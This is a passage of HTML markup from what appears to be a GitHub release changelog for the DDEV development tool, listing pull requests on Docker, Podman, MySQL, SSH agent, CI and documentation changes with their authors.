<li>test(quickstart): remove pin for <code>@sveltejs/adapter-node</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701858950" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8497" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8497/hovercard" href="https://github.com/ddev/ddev/pull/8497">#8497</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4723621004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8511" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8511/hovercard" href="https://github.com/ddev/ddev/pull/8511">#8511</a></li>
<li>ci(github): add brew sandbox setup, remove obsolete env, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4642259004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8469" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8469/hovercard" href="https://github.com/ddev/ddev/pull/8469">#8469</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724822655" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8512" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8512/hovercard" href="https://github.com/ddev/ddev/pull/8512">#8512</a></li>
<li>fix(mysql): guard ENV HOME injection to db context only, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721459214" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8508" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8508/hovercard" href="https://github.com/ddev/ddev/issues/8508">#8508</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725527190" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8513" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8513/hovercard" href="https://github.com/ddev/ddev/pull/8513">#8513</a></li>
<li>fix(docker): do not cache build on start, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549207054" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8433" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8433/hovercard" href="https://github.com/ddev/ddev/issues/8433">#8433</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718896990" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8506" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8506/hovercard" href="https://github.com/ddev/ddev/pull/8506">#8506</a></li>
<li>feat(drupal): Support new dr command built into drupal11.4+, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4710077190" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8500" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8500/hovercard" href="https://github.com/ddev/ddev/issues/8500">#8500</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720878653" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8507" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8507/hovercard" href="https://github.com/ddev/ddev/pull/8507">#8507</a></li>
<li>fix(dbeaver): Add flatpak user binary path to search list, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727881183" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8517" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8517/hovercard" href="https://github.com/ddev/ddev/issues/8517">#8517</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727903372" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8518" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8518/hovercard" href="https://github.com/ddev/ddev/pull/8518">#8518</a></li>
<li>refactor(auth-ssh): remove build step, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4711855724" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8501" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8501/hovercard" href="https://github.com/ddev/ddev/issues/8501">#8501</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716695362" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8503" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8503/hovercard" href="https://github.com/ddev/ddev/pull/8503">#8503</a></li>
<li>feat: allow mutagen with use-hardened-images, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1163134802" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/3680" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/3680/hovercard" href="https://github.com/ddev/ddev/pull/3680">#3680</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685988680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8491" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8491/hovercard" href="https://github.com/ddev/ddev/pull/8491">#8491</a></li>
<li>feat(docker): respect docker-buildx from snap on linux, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727709566" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8515" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8515/hovercard" href="https://github.com/ddev/ddev/issues/8515">#8515</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728073401" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8519" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8519/hovercard" href="https://github.com/ddev/ddev/pull/8519">#8519</a></li>
<li>docs: replace newgrp with sg for docker group activation, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332343177" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8350" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8350/hovercard" href="https://github.com/ddev/ddev/issues/8350">#8350</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736396280" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8524" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8524/hovercard" href="https://github.com/ddev/ddev/pull/8524">#8524</a></li>
<li>fix(commands): correct case typo in <code>ddev sequelace</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733613998" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8521" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8521/hovercard" href="https://github.com/ddev/ddev/issues/8521">#8521</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733715228" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8522" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8522/hovercard" href="https://github.com/ddev/ddev/pull/8522">#8522</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mficzel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mficzel">@mficzel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733715228" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8522" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8522/hovercard" href="https://github.com/ddev/ddev/pull/8522">#8522</a></li>
<li>build(deps): bump moby and docker-compose by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736239790" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8523" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8523/hovercard" href="https://github.com/ddev/ddev/pull/8523">#8523</a></li>
<li>docs: skip codeberg, use stable link for docs in github workflows (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744327319" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8528" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8528/hovercard" href="https://github.com/ddev/ddev/pull/8528">#8528</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744327319" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8528" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8528/hovercard" href="https://github.com/ddev/ddev/pull/8528">#8528</a></li>
<li>build: remove pin for Node.js, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4557653464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8438" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8438/hovercard" href="https://github.com/ddev/ddev/pull/8438">#8438</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744191788" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8527" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8527/hovercard" href="https://github.com/ddev/ddev/pull/8527">#8527</a></li>
<li>fix(start): do not ask for poweroff with new ddev-ssh-agent, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4732526980" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8520" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8520/hovercard" href="https://github.com/ddev/ddev/issues/8520">#8520</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741864016" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8525" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8525/hovercard" href="https://github.com/ddev/ddev/pull/8525">#8525</a></li>
<li>ci(podman): update workflow for Podman 6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741982501" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8526" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8526/hovercard" href="https://github.com/ddev/ddev/pull/8526">#8526</a></li>
<li>fix(podman): restrict keep-id userns to Linux only, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065154991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8223" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8223/hovercard" href="https://github.com/ddev/ddev/issues/8223">#8223</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744330972" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8529" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8529/hovercard" href="https://github.com/ddev/ddev/issues/8529">#8529</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727719482" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8516" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8516/hovercard" href="https://github.com/ddev/ddev/pull/8516">#8516</a></li>
<li>docs: Remove link to very old processwire thread (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754222605" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8533" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8533/hovercard" href="https://github.com/ddev/ddev/pull/8533">#8533</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754222605" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8533" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8533/hovercard" href="https://github.com/ddev/ddev/pull/8533">#8533</a></li>
<li>fix: continue when <code>#ddev-generated</code> is missing in generate config functions, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="636509327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/2305" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/2305/hovercard" href="https://github.com/ddev/ddev/pull/2305">#2305</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753746905" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8532" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8532/hovercard" href="https://github.com/ddev/ddev/pull/8532">#8532</a></li>
<li>docs: Ignore winaero.com, cert expired [skip buildkite] (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768471904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8537" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8537/hovercard" href="https://github.com/ddev/ddev/pull/8537">#8537</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768471904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8537" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8537/hovercard" href="https://github.com/ddev/ddev/pull/8537">#8537</a></li>
<li>ci: add macOS Podman rootless Buildkite pipeline, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065154991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8223" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8223/hovercard" href="https://github.com/ddev/ddev/issues/8223">#8223</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4749045585" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8530" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8530/hovercard" href="https://github.com/ddev/ddev/pull/8530">#8530</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4749045585" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8530" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8530/hovercard" href="https://github.com/ddev/ddev/pull/8530">#8530</a></li>
<li>test(auth-ssh): harden ddevauthssh.expect against passphrase prompt race by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4767122944" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8536" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8536/hovercard" href="https://github.com/ddev/ddev/pull/8536">#8536</a></li>
<li>build: bump actions/cache from 5 to 6 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769479389" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8538" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8538/hovercard" href="https://github.com/ddev/ddev/pull/8538">#8538</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769479389" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8538" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8538/hovercard" href="https://github.com/ddev/ddev/pull/8538">#8538</a></li>
<li>fix: stop honoring XDG_CONFIG_HOME on Linux too, use DDEV_XDG_CONFIG_HOME, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694586960" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8493" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8493/hovercard" href="https://github.com/ddev/ddev/issues/8493">#8493</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752549694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8531" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8531/hovercard" href="https://github.com/ddev/ddev/pull/8531">#8531</a></li>
<li>fix: correct typos in global and project config comment docs (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780672518" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8541" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8541/hovercard" href="https://github.com/ddev/ddev/pull/8541">#8541</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4780672518" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8541" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8541/hovercard" href="https://github.com/ddev/ddev/pull/8541">#8541</a></li>
<li>test: fix TestCheckForMultipleGlobalDdevDirs on Windows, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752549694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8531" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8531/hovercard" href="https://github.com/ddev/ddev/pull/8531">#8531</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785182644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8542" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8542/hovercard" href="https://github.com/ddev/ddev/pull/8542">#8542</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785182644" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8542" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8542/hovercard" href="https://github.com/ddev/ddev/pull/8542">#8542</a></li>
<li>feat: add x-ddev.omit-ddev-labels to skip com.ddev.* label injection, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390914107" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8389" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8389/hovercard" href="https://github.com/ddev/ddev/issues/8389">#8389</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4778206278" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8540" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8540/hovercard" href="https://github.com/ddev/ddev/pull/8540">#8540</a></li>
<li>build(docker): bump images to v1.25.3 for release, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785709464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8544" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8544/hovercard" href="https://github.com/ddev/ddev/issues/8544">#8544</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787726460" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8547" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8547/hovercard" href="https://github.com/ddev/ddev/pull/8547">#8547</a></li>
<li>ci(buildkite): trim podman machine and run maintenance post-test (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795142426" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8551" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8551/hovercard" href="https://github.com/ddev/ddev/pull/8551">#8551</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4795142426" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8551" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8551/hovercard" href="https://github.com/ddev/ddev/pull/8551">#8551</a></li>
<li>docs(typo3): require Camino theme, drop empty distribution prompt (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789962878" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8548" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8548/hovercard" href="https://github.com/ddev/ddev/pull/8548">#8548</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789962878" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8548" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8548/hovercard" href="https://github.com/ddev/ddev/pull/8548">#8548</a></li>
<li>docs(hosting): add guidance for Let's Encrypt failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpugh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpugh">@jonpugh</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785496062" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8543/hovercard" href="https://github.com/ddev/ddev/pull/8543">#8543</a></li>
<li>docs(docker): add Podman and Docker rootless setup, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549338538" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8434" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8434/hovercard" href="https://github.com/ddev/ddev/issues/8434">#8434</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4797374506" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8552" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8552/hovercard" href="https://github.com/ddev/ddev/pull/8552">#8552</a></li>
<li>ci(macos): untap pre-installed aws/tap before brew install by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4809536273" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8559" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8559/hovercard" href="https://github.com/ddev/ddev/pull/8559">#8559</a></li>
<li>docs(wsl2): use Ubuntu-26.04 instead of Ubuntu-24.04, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276951921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8326" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8326/hovercard" href="https://github.com/ddev/ddev/issues/8326">#8326</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4436512981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8408" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8408/hovercard" href="https://github.com/ddev/ddev/pull/8408">#8408</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4802996009" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8553" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8553/hovercard" href="https://github.com/ddev/ddev/pull/8553">#8553</a></li>
<li>fix(webserver): restore nonstandard router port in HTTP_HOST for nginx-fpm, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806198523" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8554" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8554/hovercard" href="https://github.com/ddev/ddev/issues/8554">#8554</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806397840" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8555" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8555/hovercard" href="https://github.com/ddev/ddev/pull/8555">#8555</a></li>
